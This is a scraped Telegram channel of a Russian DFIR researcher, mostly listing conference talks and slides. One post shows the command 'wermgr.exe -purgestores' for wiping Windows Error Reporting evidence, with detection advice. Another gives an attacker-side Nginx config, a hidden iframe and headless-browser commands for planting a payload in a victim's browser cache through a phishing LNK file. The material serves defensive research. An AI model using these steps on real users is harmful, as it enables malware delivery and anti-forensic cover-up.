#presentations
🔵 Решил собрать информацию по своим докладам в одном посте, где добавил как ссылки на сами презентации, так и на записи выступлений💻
1️⃣ CyberCamp 2023. Чертоги оперативной памяти: как проанализировать то, что пока не забыто.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления.
2️⃣ SOC Tech 2023. Как удачно испортить выходной день DFIR-специалисту?
*️⃣ Ссылка на презентацию.
3️⃣ BI.ZONE Cybersecurity Meetup №1. Смотритель зоопарка или как DFIR специалисту выжить в незнакомой ему инфраструктуре.
*️⃣ Ссылка на презентацию.
4️⃣ PHDays 2024. Было ваше — стало наше: что полезного можно найти на серверах злоумышленников.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления.
5️⃣ PHDays 2024. Война с песочницей: техники по ту сторону баррикад.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления.
6️⃣ OFFZONE 2024. Новый инцидент, или Как я снова встретил MikroTik.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления.
7️⃣ CyberCamp 2024. Хроники противостояния: взгляд на RDP с обеих сторон.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления;
*️⃣ Дополнительная информация.
8️⃣ SOC Forum 2024. Bad Forensicator.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления.
9️⃣ CyberCamp 2025 (MeetUp DFIR). Криминалистика — это не Дикий Запад, здесь есть правила.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления;
*️⃣ Дополнительная информация.
1️⃣ 0️⃣ CTI Meetup №3 (Inseca). Уйди в туман, запутай след.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления.
1️⃣ 1️⃣ CIRF 2025. Куда же упало яблоко, или искусство анализа триажа macOS.
*️⃣ Ссылка на презентацию;
*️⃣ Дополнительная информация.
🔵 Решил собрать информацию по своим докладам в одном посте, где добавил как ссылки на сами презентации, так и на записи выступлений
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥15🔥9👍5❤1👏1💘1
#lolbas #anti_forensics #wer
🔵 Сегодня мы рассмотрим один из контр-криминалистических методов — использование нативной утилиты
Например, при падении приложения будет сгенерирован отчёт
🔹возникшей ошибке;
🔹полном пути к исполняемому файлу;
🔹подгружаемых DLL;
🔹SHA-1 хеше исполняемого файла (начиная с ОС Windows 10).
🔴 С помощью параметра
*️⃣
*️⃣
*️⃣
Команда:
🔵 При создании детектирующего правила следует учитывать наличие параметра
🔵 Тесты проводились на ОС Windows 10 (21H2), а запуск команды осуществлялся под привилегированной учётной записью.
🔵 Сегодня мы рассмотрим один из контр-криминалистических методов — использование нативной утилиты
wermgr.exe ОС Windows для удаления WER-файлов. Данный исполняемый файл связан со службой Windows Error Reporting (WER), которая отвечает за сбор и отправку отладочной информации о сбоях как системных, так и сторонних приложений в Windows. Например, при падении приложения будет сгенерирован отчёт
Report.wer. Он полезен DFIR-специалисту, поскольку содержит информацию о:🔹возникшей ошибке;
🔹полном пути к исполняемому файлу;
🔹подгружаемых DLL;
🔹SHA-1 хеше исполняемого файла (начиная с ОС Windows 10).
🔴 С помощью параметра
-purgestores происходит удаление данных из следующих каталогов (см. скриншоты из Process Monitor от Sysinternals, приложенные к данному посту):%ProgramData%\Microsoft\Windows\WER\ReportArchive;%ProgramData%\Microsoft\Windows\WER\ReportQueue;%ProgramData%\Microsoft\Windows\WER\Temp.Команда:
wermgr.exe -purgestores
🔵 При создании детектирующего правила следует учитывать наличие параметра
-purgestores в командной строке процесса wermgr.exe.🔵 Тесты проводились на ОС Windows 10 (21H2), а запуск команды осуществлялся под привилегированной учётной записью.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14❤🔥3💯2👍1🐳1
This media is not supported in your browser
VIEW IN TELEGRAM
#phishing #browser_cache
🔵 На конференции Insomnihack 2025 исследователь компании Orange Cyberdefense представил доклад, посвящённый способу доставки вредоносного ПО с использованием механизмов кэширования веб-браузеров (статья №1, статья №2).
К данной работе хотелось бы добавить некоторое расширение, которое будет рассмотрено ниже. Но сначала кратко пройдёмся по основам.
🔵 Система кэширования веб-браузеров хранит следующие типы данных:
🔹HTML-файлы;
🔹CSS-файлы;
🔹JavaScript-файлы;
🔹медиафайлы;
🔹веб-шрифты.
Однако возникает вопрос: «Как веб-браузеры определяют, какие файлы необходимо добавить в кэш?»
Здесь всё довольно просто — используется HTTP-заголовок
🔴 Настройка сервера атакующей стороны:
Конфигурационный файл Nginx (
Команда №1 (Mozilla Firefox; движок Quantum):
Примечания:
*️⃣ одновременная работа нескольких независимых процессов с одним профилем Firefox невозможна. Поэтому необходимо либо завершить текущий процесс
*️⃣ Каталог расположения кэша:
Команды №2 (Microsoft Edge, Google Chrome и т.п.; движок Chromium):
Примечания:
*️⃣ в headless-режиме Google Chrome необходимо указать отдельный каталог для хранения пользовательских данных (параметр
*️⃣ если файл достаточно большой, рекомендуется увеличить объём кэша на диске (параметр
*️⃣ Каталог расположения кэша MSEdge (headless-режим):
🔵 На конференции Insomnihack 2025 исследователь компании Orange Cyberdefense представил доклад, посвящённый способу доставки вредоносного ПО с использованием механизмов кэширования веб-браузеров (статья №1, статья №2).
К данной работе хотелось бы добавить некоторое расширение, которое будет рассмотрено ниже. Но сначала кратко пройдёмся по основам.
🔵 Система кэширования веб-браузеров хранит следующие типы данных:
🔹HTML-файлы;
🔹CSS-файлы;
🔹JavaScript-файлы;
🔹медиафайлы;
🔹веб-шрифты.
Однако возникает вопрос: «Как веб-браузеры определяют, какие файлы необходимо добавить в кэш?»
Здесь всё довольно просто — используется HTTP-заголовок
Content-Type, который можно контролировать на стороне веб-сервера.🔴 Настройка сервера атакующей стороны:
Конфигурационный файл Nginx (
/etc/nginx/sites-available/default):...
location /i_am_not_malware.zip {
add_header NOTMALWARE "purple_team_test";
types { } default_type image/jpeg;
}
...
Главная страница веб-сайта (/var/www/html/index.html):...
<iframe src="i_am_not_malware.zip" style="width:0;height:0;border:0;visibility:hidden;"></iframe>
...
🔴 Расширение.
В самом докладе рассматривается пример, при котором пользователю требуется перейти на фишинговый веб-сайт, чтобы файл сохранился в кэше. Однако описанный способ можно применить и в другом виде. Например, можно прописать в LNK-файле ("классическое" вложение в письме) команду перехода на сайт с помощью веб-браузера в headless-режиме (см. ниже). В данном случае файл также будет добавлен в кэш. Команда №1 (Mozilla Firefox; движок Quantum):
"C:\Program Files\Mozilla Firefox\firefox.exe" --headless --url http://<IP_DOMAIN>/index.html
Примечания:
firefox.exe, либо использовать отдельный профиль (создать) для нового процесса:"C:\Program Files\Mozilla Firefox\firefox.exe" --createprofile sidekick
"C:\Program Files\Mozilla Firefox\firefox.exe" --P sidekick --headless --url http://<IP_DOMAIN>/index.html
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\*.*\cache2\entries.Команды №2 (Microsoft Edge, Google Chrome и т.п.; движок Chromium):
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --disable-gpu --disk-cache-size=1073741824 --dump-dom https://<IP_DOMAIN>/index.html
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --user-data-dir="%USERPROFILE%\AppData\Local\Chrome\purple" --disk-cache-size=1073741824 --dump-dom https://<IP_DOMAIN>/index.html
Примечания:
--user-data-dir), иначе после завершения сессии кэш и другие данные будут удалены;--disk-cache-size), например, до 100 Мбайт;%LOCALAPPDATA%\Temp\HeadlessEdge*\Default\Cache\Cache_Data.Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13❤3❤🔥2👍2💅2🐳1💯1
#pentestaward2025
Вчера побывал на ежегодной независимой премии для пентестеров Pentest Award 2025, организованной компанией Awillix (@justsecurity). И да, ивент уже третий год стабильно набирает обороты.🚪
Я был приятно удивлён, что смог занять второе место в номинации «РАЗ BYPASS, ДВА BYPASS", где в своей работе затронул такие темы, как: обход Sandbox, антифорензика и многое другое (да-да, об этом подробнее расскажу чуть позже).💻
И отдельно хочется поблагодарить организаторов и жюри за большую работу — как по организации этого уникального и лампового мероприятия, так и за проверку 140 работ (!!!), отправленных в этом году.😘
С самой трансляцией можно ознакомиться тут.
Ну и хотелось бы выделить @Russian_OSlNT, который ворвался на этот ивент и собрал несколько побед. Поздравляю!
Вчера побывал на ежегодной независимой премии для пентестеров Pentest Award 2025, организованной компанией Awillix (@justsecurity). И да, ивент уже третий год стабильно набирает обороты.
Я был приятно удивлён, что смог занять второе место в номинации «РАЗ BYPASS, ДВА BYPASS", где в своей работе затронул такие темы, как: обход Sandbox, антифорензика и многое другое (да-да, об этом подробнее расскажу чуть позже).
И отдельно хочется поблагодарить организаторов и жюри за большую работу — как по организации этого уникального и лампового мероприятия, так и за проверку 140 работ (!!!), отправленных в этом году.
С самой трансляцией можно ознакомиться тут.
Ну и хотелось бы выделить @Russian_OSlNT, который ворвался на этот ивент и собрал несколько побед. Поздравляю!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥28❤11🥰4👏4🐳1
#offzone2025
22 августа буду выступать на конференции OffZone 2025 с двумя докладами [🤪 которые я успешно доделал 🤪 ]. Буду рад видеть каждого, кто заглянет на мои выступления.
Расписание:
1️⃣ "Охота на призраков: изучение сетевой инфраструктуры атакующих".
Трек: Threat.Zone.
Время: 12:30-13:00.
Описание.
2️⃣ "Охота на тануки: узнаём точную версию GitLab".
Трек: Fast Track.
Время: 14:45–15:15.
Описание.
22 августа буду выступать на конференции OffZone 2025 с двумя докладами [
Расписание:
Трек: Threat.Zone.
Время: 12:30-13:00.
Описание.
Трек: Fast Track.
Время: 14:45–15:15.
Описание.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26👏3❤🔥2❤2👍1🐳1
AzerskiyVD_ThreatZone_OffZone2025.pdf
6.1 MB
#offzone2025
🔵 Прошла очередная конференция — OFFZONE 2025. Поэтому самое время выложить презентации докладов, с которыми я выступал на данном мероприятии.🚪
1️⃣ На следующей неделе выложу дополнительный материал к докладу "Охота на призраков: изучение сетевой инфраструктуры атакующих" — полезные веб-ресурсы и ссылки, оформленные в Obsidian.🤪
2️⃣ Также позже залью на свой GitHub скрипты из второго доклада, связанного с GitLab.
🔵 Прошла очередная конференция — OFFZONE 2025. Поэтому самое время выложить презентации докладов, с которыми я выступал на данном мероприятии.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18🔥16❤🔥6🐳2
#uwp #DFIR #mfd2025
🔵 С 11 по 12 сентября проходила девятая ежегодная конференция — Moscow Forensics Day 2025.
На данном мероприятии выступал с докладом на тему "UWP под прицелом DFIR: что скрывают современные Windows-приложения".
Удалось осветить следующие пункты:
1️⃣ Что такое UWP (Universal Windows Platform) и MSIX-пакеты.
2️⃣ Инциденты ИБ, связанные с использованием MSIX-пакетов.
3️⃣ Криминалистические артефакты, возникающие при установке MSIX-пакета, и их источники.
4️⃣ Приложения из Microsoft Store, представляющие интерес для злоумышленников.
🔵 Также отдельно выкладываю список полезных веб-ресурсов/веб-ссылок (оформлено в Obsidian).
P.S.: уже в состоянии ожидания Moscow Forensics Day 2026🚪
🔵 С 11 по 12 сентября проходила девятая ежегодная конференция — Moscow Forensics Day 2025.
На данном мероприятии выступал с докладом на тему "UWP под прицелом DFIR: что скрывают современные Windows-приложения".
Удалось осветить следующие пункты:
🔵 Также отдельно выкладываю список полезных веб-ресурсов/веб-ссылок (оформлено в Obsidian).
P.S.: уже в состоянии ожидания Moscow Forensics Day 2026
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍9❤🔥4👎2🐳2
🔥13👍8❤🔥5🐳2👎1
#events
🔵 Уже почти конец года, но различных выступлений и активностей так и не убавилось.🚪
1️⃣ Начнём с самого интересного — это CyberCamp 2025 (ну просто любимки). В первый день докладов кэмпа (21 октября) можно будет погрузиться в мир тайн компрометации. Поэтому рекомендую послушать эти три доклада.
Также в данном году появился новый формат — консультации, где можно задать свои животрепещущие вопросы спикерам по различным темам. Если хочется обсудить Incident Response, Compromise Assessment или Purple Teaming, то регистрируйтесь — пообщаемся на эти темы без лишней душноты.💻
P.S.: планируется какой-то секретный эфир. Что именно это будет, пока остается загадкой.
UPDATE: секретный эфир.
2️⃣ На конференция SOC Forum 2025 будет доклад "После Red Team можно не бояться атак... Не бояться атак, да?" (20 ноября). Совместно с Олегом поговорим про различия... между реальными хакерскими группировками и командами Pentest/Red Team.
3️⃣ И последнее: подал 2 доклада на ZeroNights. Так что, ждём результатов от CFP комитета.
🔵 Уже почти конец года, но различных выступлений и активностей так и не убавилось.
Также в данном году появился новый формат — консультации, где можно задать свои животрепещущие вопросы спикерам по различным темам. Если хочется обсудить Incident Response, Compromise Assessment или Purple Teaming, то регистрируйтесь — пообщаемся на эти темы без лишней душноты.
P.S.: планируется какой-то секретный эфир. Что именно это будет, пока остается загадкой.
UPDATE: секретный эфир.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥24❤8👍6💅5💩1🐳1
#events
🔵 Пришло время для нового поста! А после него начну публиковать интересные исследования — ждите их в декабре. Пора освежить канал не только рассказами о выступлениях, но и чем-то новым.🍩
1️⃣ Про SOC Forum я уже писал в предыдущем посте, но напомню, что 20 ноября будет доклад на тему «После Red Team можно не бояться атак... Не бояться атак, да?». Да-да, там также будут мемы. Куда же без них!
2️⃣ А 21 ноября будет эфир, завершающий арку CyberCamp 2025.
На нём будет:
➖ разбор четырех заданий их авторами: «Горький коммит» из соло-программы (моё наследие; будет разбор данного задания от меня🍩 ), а из командных киберучений — to My Curious Programmer, «Политик аналитик», NightCall;
➖ подведение итогов кэмпа и статистика — самые интересные доклады и задания, самые активные участники, обсуждение обратной связи и планов на будущее;
➖ возможность выиграть еще немного мерча!
3️⃣ И напоследок, 26 ноября совместно с Николаем Микрюковым (@Nmikryukov) будем выступать на конференции ZeroNights 2025 с докладов «Горшочек, не вари! Истории про Web3-ловушки», где расскажем про существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов.
Ну и мем для привлечения внимания🥳
🔵 Пришло время для нового поста! А после него начну публиковать интересные исследования — ждите их в декабре. Пора освежить канал не только рассказами о выступлениях, но и чем-то новым.
На нём будет:
Ну и мем для привлечения внимания
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21❤🔥5💯4⚡2❤1👍1🆒1
#cybercamp2025 #DFIR #task
🔵 Настало время опубликовать пост с веб-ссылками на доклады и разбором одного задания с CyberCamp 2025. Максимальная концентрация DFIR.🍩
1️⃣ Доклад «Первое правило CI/CD-клуба: компрометация начинается с доверия».
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления.
2️⃣ Разбор задания «Горький коммит».
*️⃣ Ссылка на презентацию;
*️⃣ Запись эфира с разборами кейсов.
P.S.: в разборе присутствуют 2 веб-ссылки на дополнительный материал:
➖ подготовка к эмуляции атаки;
➖ эмуляция действий атакующих.
🔵 И конечно, не могу не упомянуть доклады от своих любимок (😍 ):
3️⃣ Доклад «ИБ-специалист в отпуске? Поздравляю, теперь ты – инцидент-респондер!» от Ивана Грузда.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления.
4️⃣ Доклад «Чертовски хороший Compromise Assessment» от Анастасии Петровой.
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления.
🔵 Настало время опубликовать пост с веб-ссылками на доклады и разбором одного задания с CyberCamp 2025. Максимальная концентрация DFIR.
P.S.: в разборе присутствуют 2 веб-ссылки на дополнительный материал:
🔵 И конечно, не могу не упомянуть доклады от своих любимок (
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤6💘3🦄2
#socforum2025 #zeronights2025
🔵 Последние 2 доклада в этом году (🍩 ):
1️⃣ Доклад «После Red Team можно не бояться атак... Не бояться атак, да?» [SOC Forum 2025].
➖ Совместно с Олегом Скулкиным (ссылка на TG-канал).
Описание доклада:
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления (будет позже).
2️⃣ Доклад «Горшочек, не вари! Истории про Web3-ловушки» [ZeroNights 2025].
➖ Совместно с Николаем Микрюковым (@Nmikryukov).
Описание доклада:
*️⃣ Ссылка на презентацию;
*️⃣ Запись выступления (будет позже).
🔵 Последние 2 доклада в этом году (
Описание доклада:
В докладе рассмотрим различия в тактиках, техниках и процедурах (TTP) между реальными хакерскими группировками и командами Pentest / Red Team. Эта разница объясняется тем, что профили атак, используемые в пентестах, часто не отражают реальные угрозы.
Доклад поможет понять, как отличать инциденты, связанные с реальными атаками, от имитаций, а также почему реагирование на «пентестовые» сценарии могут привести к ложному чувству защищенности.
Описание доклада:
Смарт-контракты, которые только притворяются уязвимыми... В нашем докладе мы рассмотрим существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19❤🔥7🦄5😍2😎1